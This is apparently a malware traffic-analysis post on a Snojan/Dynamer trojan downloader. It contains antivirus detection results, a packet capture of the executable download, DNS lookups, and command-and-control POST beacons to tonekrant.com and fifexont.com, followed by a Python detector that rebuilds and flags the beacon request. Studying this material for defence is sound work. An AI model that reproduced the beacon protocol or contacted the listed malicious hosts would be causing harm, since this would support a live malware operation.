Snojan Dynamer Trojan Downloader Malware fifexont.com tonekrant.com FULL PCAP File Download Traffic Analysis

Download Attachments

  • front (pcap, 38 KB)
    Date added: February 20, 2017 5:33 am
SHA256: a66c3e211004c7d403f633a0ced7327f5b2b102f47be4226d24edcb7ebd21562
File name: front.exe
Detection ratio: 49 / 58
Analysis date: 2017-02-20 05:26:08 UTC

Antivirus results (excerpt; 16 of the 58 engines are listed here)

Antivirus                Result                                       Update
ALYac                    Trojan.GenericKD.4294253                     20170220
AVG                      Agent5.AXHG                                  20170220
AVware                   Trojan.Win32.Generic!BT                      20170220
Ad-Aware                 Trojan.GenericKD.4294253                     20170220
AegisLab                 Uds.Dangerousobject.Multi!c                  20170220
AhnLab-V3                Trojan/Win32.Snojan.C1770480                 20170219
Arcabit                  Trojan.Generic.D41866D                       20170220
Avast                    Win32:Malware-gen                            20170220
Avira (no cloud)         TR/Crypt.ZPACK.wcpog                         20170219
Baidu                    Win32.Trojan.WisdomEyes.16070401.9500.9999   20170217
BitDefender              Trojan.GenericKD.4294253                     20170220
Bkav                     HW32.Packed.3570                             20170218
CAT-QuickHeal            Trojan.Dynamer                               20170218
ClamAV                   Win.Trojan.Generic-5747581-0                 20170220
Comodo                   UnclassifiedMalware                          20170220
CrowdStrike Falcon (ML)  malicious_confidence_100% (W)                20170130

2017-02-18 07:29:58.854612 IP 192.168.1.102.55863 > 46.30.213.95.80: Flags [P.], seq 0:285, ack 1, win 64240, length 285: HTTP: GET /front.exe HTTP/1.1
GET /front.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: galflview.com
Connection: Keep-Alive

2017-02-18 07:30:39.853148 IP 192.168.1.102.58750 > 75.75.75.75.53: 64438+ A? mutinenag.com. (31)
2017-02-18 07:30:39.895762 IP 192.168.1.102.49577 > 75.75.75.75.53: 38977+ A? mutinenag.com.hsd1.md.comcast.net. (51)
2017-02-18 07:30:39.926948 IP 192.168.1.102.49577 > 75.75.76.76.53: 38977+ A? mutinenag.com.hsd1.md.comcast.net. (51)
2017-02-18 07:30:44.725455 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
2017-02-18 07:30:58.514427 IP 192.168.1.102.50385 > 75.75.75.75.53: 22454+ A? v10.vortex-win.data.microsoft.com. (51)
2017-02-18 07:31:01.723097 IP 192.168.1.102.50386 > 75.75.75.75.53: 16459+ A? mumeraxo.com. (30)
2017-02-18 07:31:01.794496 IP 192.168.1.102.58993 > 75.75.75.75.53: 13753+ A? mumeraxo.com.hsd1.md.comcast.net. (50)
2017-02-18 07:31:01.825945 IP 192.168.1.102.58993 > 75.75.76.76.53: 13753+ A? mumeraxo.com.hsd1.md.comcast.net. (50)
2017-02-18 07:31:12.547120 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
2017-02-18 07:31:23.630061 IP 192.168.1.102.58994 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:24.641948 IP 192.168.1.102.58995 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:25.627370 IP 192.168.1.102.58996 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:25.629833 IP 192.168.1.102.58994 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:26.641969 IP 192.168.1.102.58995 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:27.627190 IP 192.168.1.102.58996 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:27.627605 IP 192.168.1.102.58997 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:27.630024 IP 192.168.1.102.58994 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:28.032961 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [S], seq 3536318263, win 8192, options

2017-02-18 07:31:28.202872 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [P.], seq 0:428, ack 1, win 256, length 428: HTTP: POST /js.php HTTP/1.1
POST /js.php HTTP/1.1
Host: tonekrant.com
Accept: text/html, */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Connection: close

PKEY……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2017-02-18 07:31:28.353750 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [.], ack 2, win 256, length 0
2017-02-18 07:31:28.354903 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [F.], seq 428, ack 2, win 256, length 0
2017-02-18 07:31:28.642457 IP 192.168.1.102.58995 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:29.627324 IP 192.168.1.102.58996 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:29.630282 IP 192.168.1.102.58994 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:30.642485 IP 192.168.1.102.58995 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:37.200322 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
2017-02-18 07:31:43.367646 IP 192.168.1.102.58998 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
2017-02-18 07:31:44.361927 IP 192.168.1.102.58999 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
2017-02-18 07:31:45.361997 IP 192.168.1.102.59000 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
2017-02-18 07:31:45.363970 IP 192.168.1.102.58998 > 75.75.76.76.53: 46732+ A? fifexont.com. (30)
2017-02-18 07:31:46.361710 IP 192.168.1.102.58999 > 75.75.76.76.53: 46732+ A? fifexont.com. (30)

2017-02-18 07:31:46.827372 IP 192.168.1.102.56024 > 93.179.121.170.80: Flags [P.], seq 0:427, ack 1, win 256, length 427: HTTP: POST /js.php HTTP/1.1
POST /js.php HTTP/1.1
Host: fifexont.com
Accept: text/html, */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Connection: close

PKEY……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………
2017-02-18 07:31:46.976014 IP 192.168.1.102.56024 > 93.179.121.170.80: Flags [.], ack 2, win 256, length 0
2017-02-18 07:31:46.976419 IP 192.168.1.102.56024 > 93.179.121.170.80: Flags [F.], seq 427, ack 2, win 256, length 0
2017-02-18 07:31:47.361693 IP 192.168.1.102.59000 > 75.75.76.76.53: 46732+ A? fifexont.com. (30)
2017-02-18 07:31:47.364159 IP 192.168.1.102.58998 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
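Both POSTs to /js.php (Host: tonekrant.com to 93.179.121.47 and Host: fifexont.com to 93.179.121.170) declare Content-Length: 4 with a body of PKEY, yet tcpdump reports the segments as 428 and 427 bytes. Assuming CRLF line endings, the request line and headers come to 157 and 156 bytes respectively, so headers plus PKEY account for 161 and 160 bytes and 267 bytes follow the declared body in each request; tcpdump -A prints them as dots, which means they are non-printable. Anything that trusts Content-Length reads PKEY and stops, but the extra bytes arrive on the socket all the same, so the declared-versus-actual gap, the fixed PKEY prefix and the /js.php path are the features worth keying on. The Python below is an added example and is not code from the post or from the malware: it rebuilds such a request from the captured headers, with the 267 trailing bytes as constructed high-bit stand-ins (the real values are not recoverable from the listing), and flags it. The beacon_like heuristic and the 0.5 printable-ratio cut-off are my own assumptions.

```python
import string

# Bytes that tcpdump -A prints as themselves rather than as '.'.
PRINTABLE = frozenset(string.printable.encode("ascii"))


def split_http_request(raw: bytes):
    """Split a raw HTTP/1.x request into (request line, lower-cased header dict, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end-of-headers marker")
    lines = head.split(b"\r\n")
    request_line = lines[0].decode("ascii", "replace")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(b":")
        headers[key.strip().decode("ascii", "replace").lower()] = \
            value.strip().decode("ascii", "replace")
    return request_line, headers, body


def printable_ratio(data: bytes) -> float:
    """Fraction of printable bytes; 1.0 for empty input so absence never looks binary."""
    if not data:
        return 1.0
    return sum(b in PRINTABLE for b in data) / len(data)


def analyze_post(raw: bytes) -> dict:
    """Compare the declared Content-Length with what actually arrived and apply
    a beacon heuristic (an assumption, not a published signature): POST /js.php,
    declared body exactly PKEY, and a mostly non-printable overshoot."""
    request_line, headers, body = split_http_request(raw)
    method, path, _version = request_line.split(" ", 2)
    declared = int(headers.get("content-length", "0"))
    declared_body, extra = body[:declared], body[declared:]
    ratio = printable_ratio(extra)
    return {
        "host": headers.get("host"),
        "method": method,
        "path": path,
        "declared_length": declared,
        "actual_length": len(body),
        "declared_body": declared_body,
        "trailing_bytes": len(extra),
        "trailing_printable_ratio": round(ratio, 2),
        "beacon_like": (method == "POST" and path == "/js.php"
                        and declared_body == b"PKEY"
                        and len(extra) > 0 and ratio < 0.5),
    }


# Constructed sample: the request line and headers exactly as captured to
# tonekrant.com; the 267 trailing bytes are stand-ins with the high bit set,
# because the listing shows only dots there and the real values are unknown.
TRAILING = bytes(0x80 | ((i * 37) & 0x7F) for i in range(267))
SAMPLE_POST = (
    b"POST /js.php HTTP/1.1\r\n"
    b"Host: tonekrant.com\r\n"
    b"Accept: text/html, */*\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 4\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"PKEY" + TRAILING
)

# Constructed benign form post for contrast: the body length matches the header.
SAMPLE_BENIGN = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 7\r\n"
    b"\r\n"
    b"u=alice"
)

if __name__ == "__main__":
    for sample in (SAMPLE_POST, SAMPLE_BENIGN):
        print(analyze_post(sample))
```

The rebuilt request is 428 bytes, matching the captured segment, which is the check that the 267-byte figure above is right. When you extract the real bytes from the pcap (Follow TCP Stream in Wireshark, or tcpdump -X on the segment), run them through analyze_post in place of SAMPLE_POST; the printable ratio of the trailing data then tells you whether it is encrypted or encoded rather than merely assumed to be.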

2017-02-18 07:35:43.355047 IP 192.168.1.102.49579 > 75.75.75.75.53: 44680+ A? tele.trafficmanager.net. (41)
2017-02-18 07:35:43.373699 IP 192.168.1.102.56039 > 191.239.50.77.80: Flags [S], seq 3222178950, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:35:43.402299 IP 192.168.1.102.56038 > 65.55.252.190.443: Flags [.], ack 4237, win 253, length 0
2017-02-18 07:35:43.457448 IP 192.168.1.102.56039 > 191.239.50.77.80: Flags [.], ack 3335379774, win 258, length 0
2017-02-18 07:35:43.457557 IP 192.168.1.102.56039 > 191.239.50.77.80: Flags [P.], seq 0:189, ack 1, win 258, length 189: HTTP: GET /%7B5F1B98CE-D333-41DA-B5CE-72EFDD71B6DF%7D HTTP/1.1
GET /%7B5F1B98CE-D333-41DA-B5CE-72EFDD71B6DF%7D HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: client connection
Host: tele.trafficmanager.net
